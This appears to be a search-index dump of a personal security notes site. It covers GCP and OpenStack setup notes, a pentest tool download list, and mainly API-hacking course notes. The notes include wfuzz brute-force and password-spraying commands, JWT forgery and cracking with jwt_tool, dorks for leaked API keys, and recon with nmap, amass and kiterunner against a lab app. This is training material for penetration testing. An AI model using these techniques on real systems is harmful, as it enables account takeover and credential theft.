                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#92-google-cloud-build","title":"9.2. Google Cloud Build","text":"
                                  • Managed service for source code build management.
                                  • The CI/CD tool running with Google Cloud Platform: Google Cloud build is the CI/CD tool for building the code that is stored either in source code cloud repos, or an external Git repository.
                                  • Supports building software written in any language.
                                  • Custom workflow to deploy across multiple target environments.
                                  • Tight integration with Cloud Source Repo, GitHub, and Bitbucket, which is going to be the source for your code repositories and they act as the initial phase for triggering the entire CI/CD pipeline.
                                  • Supports native Docker integration with automated deployment to Kubernetes and GKE.
                                  • Identifies vulnerabilities through efficient OS package scanning: Apart from packaging and deploying source code, the service can also identify vulnerabilities through efficient OS package scanning.

                                  Google Cloud Build takes the source code stored either in source code repo of GCP or Bitbucket, GitLab or GitHub and creates the integration and deployment pipeline.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#93-google-container-registry","title":"9.3. Google Container Registry","text":"

                                  Google Cloud Source Code Reports will store your Source Code while Cloud Build is going to be responsible for building and packaging your applications. Container Registry is going to store the Docker images and the artifacts in a centralized registry.

                                  • Single location to manage container images and repositories.
                                  • Store images close to GCE, GKE, and Kubernetes clusters: Because the Container Registry is co-located with Compute it is going to be extremely fast.
                                  • Secure, private, scalable Docker registry within GCP.
                                  • Supports RBAC to access, view, and download images.
                                  • Detects vulnerabilities in early stages of the software deployment: The service detects vulnerabilities in early stages of software deployment.
                                  • Supports automatic lock-down of vulnerable container images.
                                  • Automated container build process based on code or tag changes.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#use-case-adding-an-image-to-gcp-container-registry","title":"Use case: adding an image to GCP Container Registry","text":"

                                  In GCP Dashboard go yo Container Registry. First time it will be empty.

                                  # Run the below commands in Google Cloud Shell \n gcloud services enable containerregistry.googleapis.com \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP Project ID \n\ndocker pull busybox \ndocker images \n
                                  cat <<EOF >>Dockerfile \nfrom busybox:latest \nCMD [\"date\"] \nEOF\n
                                  docker build . -t mybusybox \u00e7\n\n# Tag your image with the convention stated by GCP\ndocker tag mybusybox gcr.io/$PROJECT_ID/mybusybox:latest \n# When listing images with docker images, you will see it renamed.\n\n# Run your image\ndocker run gcr.io/$PROJECT_ID/mybusybox:latest \n\n# Wire the credentials of GCP Container Registry with Docker\ngcloud auth configure-docker \n\n# Take our mybusybox image available in the environment and pushes it to the Container Registry.\ndocker push gcr.io/$PROJECT_ID/mybusybox:latest \n
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#94-devel-tools-integration","title":"9.4. Devel Tools Integration","text":"
                                  • IDE plugins for popular development tools.
                                    • IntelliJ.
                                    • Visual Studio.
                                    • Eclipse.
                                  • Tight integration between IDEs and managed SCM, build services.
                                  • Automates generating configuration files and deployment scripts.
                                  • Makes GCP libraries and SDKs available within the IDEs.
                                  • Enhances developer productivity
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#10-other-gcp-services","title":"10. Other GCP services","text":"","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#101-iot-services","title":"10.1. IoT Services","text":"

                                  GCP IoT has two essential services.

                                  • Cloud IoT Core: Cloud IoT Core provides machine to machine communication, device registry and overall device management capabilities. If you have multiple sensors, multiple actuators and multiple devices that need to be connected to the cloud you would use IoT core. IoT Core provides authentication and authorization of devices. It also enables machines to talk to each other. And finally you can manage the entire life cycle of devices. Tightly integrated with cloud pub/sub, and cloud functions.
                                  • Edge TPU: It is a hardware that is available to accelerate AI model standing at Edge. Edge is essentially a device that can run business logic and even artificial intelligence models in offline mode. So Edge TPU plays the role of a micro TPU or GPU that is attached to the Edge devices. When you run a TensorFlow model on a device powered by Edge TPU, the inference that is the process of performing classification or detection or predictions will be much faster. Edge TPU is available as a chip that is going to be attached to an Edge device like a Raspberry Pi or an x86 device.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#102-api-management","title":"10.2. API Management","text":"
                                  • Apigee API Platform \u00a0provides the capabilities for designing securing, publishing, analyzing, and monitoring APIs. Developers can benefit from using the APG API platform for managing the end-to-end life cycle of APIs.
                                  • API Analytics: API analytics provide end-to-end visibility across API programs with developer engagement and business metrics.
                                  • Cloud Endpoints is a service that is meant to develop, deploy, and manage APIs in the Google Cloud environment. It is based on an Nginx based proxy and it uses open API specification As the API framework. Cloud endpoints gives developers the tools they need to manage the entire API development from the beginning till deploying and maintaining them with tight integration.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#103-hybrid-and-multicloud-services","title":"10.3. Hybrid and Multicloud Services","text":"
                                  • Traffic Director routes the traffic across virtual machines and containers deployed across multiple regions.
                                  • Stackdriver is the observability platform for tracing, debugging, logging, and gaining insights into application performance and infrastructure monitoring.
                                  • GKE On-Prem takes Google Kubernetes engine and runs that within the local data center environment or on-premises.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#104-anthos","title":"10.4. Anthos","text":"
                                  • Anthos is a Google\u2019s multi-cloud and hybrid cloud platform based on Kubernetes and GKE.
                                  • Anthos enables managed Kubernetes service (GKE) in a variety of environments. Anthos enables customers to run and take control of multiple kubernetes clusters deployed through GKE and run it on other Cloud environments.
                                  • Anthos can be deployed in:
                                    • Google Cloud
                                    • vSphere (on-premises)
                                    • Amazon Web Services
                                    • Microsoft Azure
                                  • Non-GKE Kubernetes clusters can be attached to Anthos: Apart from launching and managing Kubernetes clusters through Anthos, you can also onboard and register clusters that were created outside of Anthos.
                                  • Delivers centralized management and operations for Kubernetes clusters running diverse environments.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#105-migration-tools","title":"10.5. Migration Tools","text":"
                                  • Transfer Appliance provides bulk data transfer from your data center to the cloud based on a physical appliance.
                                  • Migrate for Compute Engine is based on a tool called Illustrator that Google acquired in 2022 and this provides the capability of migrating existing virtual machines or even physical machines into GCE VMs.
                                  • Big Query Data transfer Service is a tool to run scheduled upload from third party SaaS tools and SaaS platforms into BigQuery data platform.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/openstasck/openstack-essentials/","title":"Openstack Essentials","text":"

                                  OpenStack is a set of opensource software tools for building and managing cloud computing platforms for public and private clouds. Go to official documentation.

                                  It can be managed from web application dashboard, command line tools, and from restful web services.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#overview-of-openstack-services","title":"Overview of OpenStack services","text":"","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#quick-start","title":"Quick Start","text":"

                                  Follow instructions from: https://docs.openstack.org/devstack/latest/

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#1-install-linux","title":"1. Install Linux","text":"

                                  Start with a clean and minimal install of a Linux system. DevStack attempts to support the two latest LTS releases of Ubuntu, Rocky Linux 9 and openEuler.

                                  If you do not have a preference, Ubuntu 22.04 (Jammy) is the most tested, and will probably go the smoothest.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#2-add-stack-user-optional","title":"2. Add Stack User (optional)","text":"

                                  DevStack should be run as a non-root user with sudo enabled (standard logins to cloud images such as \u201cubuntu\u201d or \u201ccloud-user\u201d are usually fine).

                                  If you are not using a cloud image, you can create a separate\u00a0stack\u00a0user to run DevStack with

                                  sudo useradd -s /bin/bash -d /opt/stack -m stack\n

                                  Ensure home directory for the\u00a0stack\u00a0user has executable permission for all, as RHEL based distros create it with\u00a0700\u00a0and Ubuntu 21.04+ with\u00a0750\u00a0which can cause issues during deployment.

                                  sudo chmod +x /opt/stack\n

                                  Since this user will be making many changes to your system, it should have sudo privileges:

                                  echo \"stack ALL=(ALL) NOPASSWD: ALL\" | sudo tee /etc/sudoers.d/stack\nsudo -u stack -i\n
                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#3-download-devstack","title":"3. Download DevStack","text":"
                                  git clone https://opendev.org/openstack/devstack\ncd devstack\n

                                  The\u00a0devstack\u00a0repo contains a script that installs OpenStack and templates for configuration files.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#4-create-a-localconf","title":"4. Create a local.conf","text":"

                                  Create a\u00a0local.conf\u00a0file with four passwords preset at the root of the devstack git repo.

                                  [[local|localrc]]\nADMIN_PASSWORD=secret\nDATABASE_PASSWORD=$ADMIN_PASSWORD\nRABBIT_PASSWORD=$ADMIN_PASSWORD\nSERVICE_PASSWORD=$ADMIN_PASSWORD\n

                                  This is the minimum required config to get started with DevStack. There is a sample\u00a0local.conf\u00a0file under the\u00a0samples\u00a0directory in the devstack repository.

                                  Warning: Only use alphanumeric characters in your passwords, as some services fail to work when using special characters.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#5-start-the-install","title":"5. Start the install","text":"
                                  ./stack.sh\n

                                  This will take 15 - 30 minutes, largely depending on the speed of your internet connection. Many git trees and packages will be installed during this process.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"files/index-of-files/","title":"Index of downloads","text":"

                                  These are some of the tools that I use when conducting penetration testing. Most of them have their own updated repositories, so the best approach for you would be to visit the official repository or download the source code. In my case, when dealing with restricted environments, there are times when I require a direct download of a previously verified and clean file. Therefore, the main goal of this list is to provide me with these resources when needed, within a matter of seconds.

                                  • Binscope: BinScope_x64.msi
                                  • Echo Mirage: EchoMirage.zip | Echo Mirage at HackingLife
                                  • Processhacker 2.39 bin: processhacker-2.39-bin.zip | Process Hacker Monitor at HackingLife.
                                  • RegistryChangesView:
                                    • RegistryChangesView (x64): registrychangesview-x64.zip
                                    • RegistryChangesView (x86): registrychangesview-x86.zip
                                  • Regshot 1.9.0: Regshot-1.9.0.zip | Regshot at HackingLife
                                  • Visual Studio Code - Community downloader: vs_community__bb594837aa124b4d8487a41015a6017a.exe
                                  ","tags":["resources"]},{"location":"files/index-of-files/#reporting","title":"Reporting","text":"

                                  https://pentestreports.com/

                                  ","tags":["resources"]},{"location":"hackingapis/","title":"Hacking APIs","text":"","tags":["api"]},{"location":"hackingapis/#about-the-course","title":"About the course","text":"

                                  Notes from the course \"APIsec Certified Expert\" a practical course in API hacking imparted by Corey J. Ball.

                                  Course: https://university.apisec.ai/

                                  Book: https://www.amazon.com/Hacking-APIs-Application-Programming-Interfaces/dp/1718502443

                                  Instructor: Corey J. Ball.

                                  ","tags":["api"]},{"location":"hackingapis/#general-index-of-the-course","title":"General index of the course","text":"
                                  • Setting up the environment
                                  • Setting up the labs + Writeups
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/","title":"API authentication attacks","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#classic-authentication-attacks","title":"Classic authentication attacks","text":"

                                  We'll consider two attacks: Password Brute-Force Attack, and Password Spraying. These attacks may take place every time that Basic Authentication is deployed in the context of a RESTful API.

                                  The principle of Basic authentication is that the consumer issues a request containing a username and password.

                                  As RESTful APIs don't maintain a state, the API need to leverage basic authentication across all endpoints. Instead of doing this, the API may leverage basic authentication once using an authentication portal, then upon providing the correct credentials, a token would be issued to be used in subsequent requests.

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#1-password-brute-force-attacks","title":"1. Password Brute-Force Attacks","text":"

                                  Brute-forcing an API's authentication is not very different from any other brute-force attack, except you will send the request to an API endpoint, the payload will often be in JSON, and the authentication values may be base64 encoded.

                                  Infinite ways to do it. You can use:

                                  • Intruder module of BurpSuite.
                                  • ZAP proxy tool.
                                  • wfuzz.
                                  • ffuf.
                                  • others.

                                  Let's see wfuzz:

                                  wfuzz -d {\"email\":\"hapihacker@hapihacjer.com\",\"password\":\"PASSWORD\"} -z file,/usr/share/wordlists/rockyou.txt -u http://localhost:8888/identity/api/auth/login --hc 500\n# -H to specify content-type headers. \n# -d allows you to include the POST Body data. \n# -u specifies the url\n# --hc/hl/hw/hh hide responses with the specified code/lines/words/chars. In our case, \"--hc 500\" hides 500 code responses.\n# -z specifies a payload   \n

                                  Tools to build password lists: + https://github.com/sc0tfree/mentalist. + CUPP - Common User Password Profiler. + crunch (already installed in kali).

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#2-password-spraying","title":"2. Password Spraying","text":"

                                  Very useful if you know the password policy of the API we are attacking. Say that there is a lockout account policy for ten tries. Then you can password spray attack with 9 tries and use for that the 9 most probable passwords for all the accounts email spotted.

                                  As in crapi we have detected before a disclosure of information in the forum page (a json response with all kind of data from users who have posted on the forum), we can save that json response as response.json and filter out the emails of users:

                                  Also, using this grep command should pull everything out of a file that resembles an email. Then you can save those captured emails to a file and use that file as a payload in Burp Suite. You can then use a command like sort -u to get rid of duplicate emails.

                                  grep -oe \"[a-zA-Z0-9._]\\+@[a-zA-Z]\\+.[a-zA-Z]\\+\" response.json | uniq | sort -u > mailusers.txt\n
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#api-authentication-attacks_1","title":"API Authentication Attacks","text":"

                                  To go further in authentification attacks we will need to analyze the API tokens and the way they are generated, and when talking about token generation and analysis, a word comes out inmediately: entropy.

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#entropy-analysis-burpsuite-sequencers-live-capture","title":"Entropy analysis: BurpSuite Sequencer's live capture","text":"

                                  Instructions to set up a proxy in Postman to intercept traffic with BurpSuite and have it sent to Sequencer.

                                  Once you send a POST request (in which a token is generated) to Sequencer, you need to define the custom token location in the context menu. After that you can click on \"Start Live Capture\".

                                  BurpSuite Sequencer provides two methods for token analysis:

                                  • Manually analysing tokens provided in a text file. To perform a manual analys, you need to provide to BurpSuite Sequencer a minimum of 100 tokens.
                                  • Performing a live capture to automatically generate tokens.

                                  Let's focus out attention on a live capture using BurpSuite Sequencer. A live capture will provide us with 20.000 tokens automatically generated. What for?

                                  • To elaborate a token analysis report that measures the entropy of the token generation process (and gives us precious tips about how to brute-force, or password spray, or bypass the authentication). For instance, if an API provider is generating tokens sequentially, then even if the token were 20 plus characters long, it could be the case that many of the characters in the token do not actually change.
                                  • To have this large collection of 20.000 identities can help us to evade security controls.

                                  The token analysis report

                                  • The summary of the findings provides info about the quality of randomness within the token sample. The goal is to determine if there are parts of the token that do not change and other parts that often change. So full entropy would be a 100% of ramdonness (any patterns found).
                                  • Character-level analysis provides the degree of confidence in the randomness of the sample at each character position. The significance level at each position is the probability of the observed character-level results occurring.
                                  • Bit-level analysis indicates the degree of confidence in the randomness of the sample at each bit position.
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#jwt-attacks","title":"JWT attacks","text":"

                                  Two tools: jwt.io and jwt_tools.

                                  To see a jwt decoded on your CLI:

                                  jwt_tool eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk\n1NDgyOTl9.yeyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk121Lj2Doa7rA9oUQk1Px7b2hUCMQJeyCsGYLbJ8hZMWc7304aX_hfkLB__1o2YfU49VajMBhhRVP_OYNafttug \n

                                  Result:

                                  Also, to see the decoded jwt, knowing that is encoded in base64, we could echo each of its parts:

                                  echo eyJhbGciOiJIUzUxMiJ9 | base64 -d  && echo eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0\nIjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9 | base64 -d\n

                                  Results:

                                  {\"alg\":\"HS512\"}{\"sub\":\"hapihacker@hapihacher.com\",\"iat\":1669461899,\"exp\":1669548299} \n

                                  To run a JWT scan with jwt_tool, run:

                                  jwt_tool -t <http://target-site.com/> -rh \"<Header>: <JWT_Token>\" -M pb\n# in the target site specify a path that leverages a call to a token\n# replace Header with the name of the Header and JWT_Tocker with the actual token.\n# -M: Scanning mode. 'pb' is playbook audit. 'er': fuzz existing claims to force errors. 'cc': fuzz common claims. 'at': All tests.\n

                                  Example:

                                  Some more jwt_tool flags that may come in hand:

                                  # -X EXPLOIT, --exploit EXPLOIT\n#                        eXploit known vulnerabilities:\n#                        a = alg:none\n#                        n = null signature\n#                        b = blank password accepted in signature\n#                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\n#                        k = key confusion (specify public key with -pk)\n#                        i = inject inline JWKS\n
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#1-the-none-attack","title":"1. The none attack","text":"

                                  A JWT with \"none\" as its algorithm is a free ticket. Modify user and become admin, root,... Also, in poorly implemented JWT, sometimes user and password can be found in the payload.

                                  To craft a jwt with \"none\" as the value for \"alg\", run:

                                  jwt_tool <JWT_Token> -X a\n
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#2-the-null-signature-attack","title":"2. The null signature attack","text":"

                                  Second attack in this section is removing the signature from the token. This can be done by erasing the signature altogether and leaving the last period in place.

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#the-blank-password-accepted-in-signature","title":"The blank password accepted in signature","text":"

                                  Launching this attack is relatively simple. Just remove the password value from the payload and leave it in blank. Then, regenerate the jwt.

                                  Also, with jwt_tool, run:

                                  jwt_tool <JWT_Token> -X b\n
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#3-the-algorithm-switch-or-key-confusion-attack","title":"3. The algorithm switch (or key-confusion) attack","text":"

                                  A more likely scenario than the provider accepting no algorithm is that they accept multiple algorithms. For example, if the provider uses RS256 but doesn\u2019t limit the acceptable algorithm values, we could alter the algorithm to HS256. This is useful, as RS256 is an asymmetric encryption scheme, meaning we need both the provider\u2019s private key and a public key in order to accurately hash the JWT signature. Meanwhile, HS256 is symmetric encryption, so only one key is used for both the signature and verification of the token. If you can discover the provider\u2019s RS256 public key and then switch the algorithm from RS256 to HS256, there is a chance you may be able to leverage the RS256 public key as the HS256 key.

                                  jwt_tool <JWT_Token> -X k -pk public-key.pem\n# You will need to save the captured public key as a file on your attacking machine.\n
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#4-the-jwt-crack-attack","title":"4. The jwt crack attack","text":"

                                  JWT_Tool can still test 12 million passwords in under a minute. To perform a JWT Crack attack using JWT_Tool, use the following command:

                                  jwt_tool <JWT Token> -C -d /wordlist.txt\n# -C indicates that you are conducting a hash crack attack\n# -d specifies the dictionary or wordlist\n

                                  Once you crack the secret of the signature, we can create our own trusted tokens. 1. Grab another user email (in the crapi app, from the data exposure vulnerability when getting the forum (GET {{baseUrl}}/community/api/v2/community/posts/recent). 2. Generate a token with the secret.

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#5-spoofing-jws","title":"5. Spoofing JWS","text":"

                                  Specify JWS URL with -ju, or set in jwtconf.ini to automate this attack.

                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/","title":"Api Reconnaissance","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#passive-reconnaissance","title":"Passive reconnaissance","text":"","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#google-dorks","title":"Google Dorks","text":"

                                  More about google dorks.

                                  Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-son/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys.","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#github","title":"Github","text":"

                                  More Githun Dorking.

                                  Also Github can be a good platform to search for overshared information relating to APIs.

                                  Github Dowking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveal some authorization token. filename: swagger.json Go to Code tab and you will have the swagger file.","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#shodan","title":"Shodan","text":"Shodan Dowking Query Expected results \"content-type: application/json\" This type of content is usually related to APIs \"wp-json\" If you are using wordpress","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#waybackmachine","title":"WaybackMachine","text":"Waybackmachine Dowking Query Expected results Path to a API We are trying to see is there is a recorded history of the API. It may provide us with endpoints that used to exist but allegedly not anymore.","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#active-reconnaissance","title":"Active reconnaissance","text":"","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#nmap","title":"nmap","text":"

                                  Nmap Cheat sheet.

                                  First, we do a service enumeration. The Nmap general detection scan uses default scripts (-sC) and service enumeration (-sV) against a target and then saves the output in three formats for later review (-oX for XML, -oN for Nmap, -oG for greppable, or -oA for all three):

                                  nmap -sC -sV [target address or network range] -oA nameofoutput\n

                                  The Nmap all-port scan will quickly check all 65,535 TCP ports for running services, application versions, and host operating system in use:

                                  nmap -p- [target address] -oA allportscan\n

                                  You\u2019ll most likely discover APIs by looking at the results related to HTTP traffic and other indications of web servers. Typically, you\u2019ll find these running on ports 80 and 443, but an API can be hosted on all sorts of different ports. Once you discover a web server, you can perform HTTP enumeration using a Nmap NSE script (use -p to specify which ports you'd like to test).

                                  nmap -sV --script=http-enum $ip -p 80,443,8000,8080\n
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#amass","title":"amass","text":"

                                  amass Cheat sheet.

                                  Before diving into using Amass, we should make the most of it by adding API keys to it.

                                  1. First, we can see which data sources are available for Amass (paid and free) by running:

                                  amass enum -list \n

                                  2. Next, we will need to create a config file to add our API keys to.

                                  sudo curl https://raw.githubusercontent.com/OWASP/Amass/master/examples/config.ini >~/.config/amass/config.ini\n

                                  3. Now, see the file ~/.config/amass/config.ini and register in as many services as you can. Once you have obtained your API ID and Secret, edit the config.ini file and add the credentials to the file.

                                  sudo nano ~/.config/amass/config.ini\n

                                  4. Now, edit the file to add the sources. It is recommended to add:

                                  • censys.io: guesswork out of understanding and protecting your organization\u2019s digital footprint.
                                  • https://asnlookup.com: Quickly lookup updated information about specific Autonomous System Number (ASN), Organization, CIDR, or registered IP addresses (IPv4 and IPv6) among other relevant data. We also offer a free and paid API access!
                                  • https://otx.alienvault.com: Quickly identify if your endpoints have been compromised in major cyber attacks using OTX Endpoint Security and many other.
                                  • https://bigdatacloud.com
                                  • https://cloudflare.com
                                  • https://www.digicert.com/tls-ssl/certcentral-tls-ssl-manager:
                                  • https://fullhunt.io
                                  • https://github.com
                                  • https://ipdata.co
                                  • https://leakix.net
                                  • as many more as you can.

                                  5. When ready, we can run amass:

                                  amass enum -active -d crapi.apisec.ai  \n

                                  Also, to be more precise:

                                  amass enum -active -d <target> | grep api\n# amass enum -active -d microsoft.com | grep api\n

                                  Amass has several useful command-line options. Use the intel command to collect SSL certificates, search reverse Whois records, and find ASN IDs associated with your target. Start by providing the command with target IP addresses

                                  amass intel -addr [target IP addresses]\n

                                  If this scan is successful, it will provide you with domain names. These domains can then be passed to intel with the whois option to perform a reverse Whois lookup:

                                  amass intel -d [target domain] \u2013whois\n

                                  This could give you a ton of results. Focus on the interesting results that relate to your target organization. Once you have a list of interesting domains, upgrade to the enum subcommand to begin enumerating subdomains. If you specify the -passive option, Amass will refrain from directly interacting with your target:

                                  amass enum -passive -d [target domain]\n

                                  The active enum scan will perform much of the same scan as the passive one, but it will add domain name resolution, attempt DNS zone transfers, and grab SSL certificate information:

                                  amass enum -active -d [target domain]\n

                                  To up your game, add the -brute option to brute-force subdomains, -w to specify the API_superlist wordlist, and then the -dir option to send the output to the directory of your choice:

                                  amass enum -active -brute -w /usr/share/wordlists/API_superlist -d [target domain] -dir [directory name]  \n
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#gobuster","title":"gobuster","text":"

                                  gobuster Cheat sheet.

                                  Great tool to brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner). Also, dictionaries are not API-specific. But here are some commands for Gobuster:

                                  gobuster dir -u <exact target url> -w </path/dic.txt> --wildcard -b 401\n# -b flag is to exclude from results an specific http response\n
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#kiterunner","title":"Kiterunner","text":"

                                  kiterunner Cheat sheet.

                                  Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute force tools like Gobuster/Dirbuster/ work to discover URL paths, it typically relies on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

                                  1. First, download the dictionaries from the project. In my case I downloaded it to /usr/share/wordlists/kiterunner/:

                                  • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
                                  • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
                                  • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
                                  • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

                                  2. Run a quick scan of your target\u2019s URL or IP address like this:

                                  kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

                                  But. Note that we conducted this scan without any authorization headers, which the target API likely requires.

                                  To use a dictionary (and not a kite file):

                                  kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

                                  If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

                                  One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

                                  kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

                                  Running this will replay the request and provide you with the HTTP response.

                                  To run Kiterunner providing an authorization token as it could be \"x-access-token\", we can take the full authorization token and add it to your Kiterunner scan with the -H option:

                                  kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/","title":"Endpoint analysis","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  If an API is not documented or the documentation is unavailable to you, then you will need to build out your own collection of requests. Two different methods:

                                  1. Build a collection in Postman
                                  2. Build out an API specification using mitmproxy2swagger.
                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#build-a-collection-in-postman","title":"Build a collection in Postman","text":"

                                  In the instance where there is no documentation and no specification file, you will have to reverse-engineer the API based on your interactions with it. Mapping an API with several endpoints and a few methods can quickly grow into quite a large attack surface. There are two ways to manually reverse engineer an API with Postman.

                                  • One way is by constructing each request.
                                  • The other way is to proxy web traffic through Postman, then use it to capture a stream of requests. This process makes it much easier to construct requests within Postman, but you\u2019ll have to remove or ignore unrelated requests.
                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#steps","title":"Steps","text":"

                                  1. Start crAPI applicationi

                                  cd ~/lab/crapi\nsudo docker-compose start\n

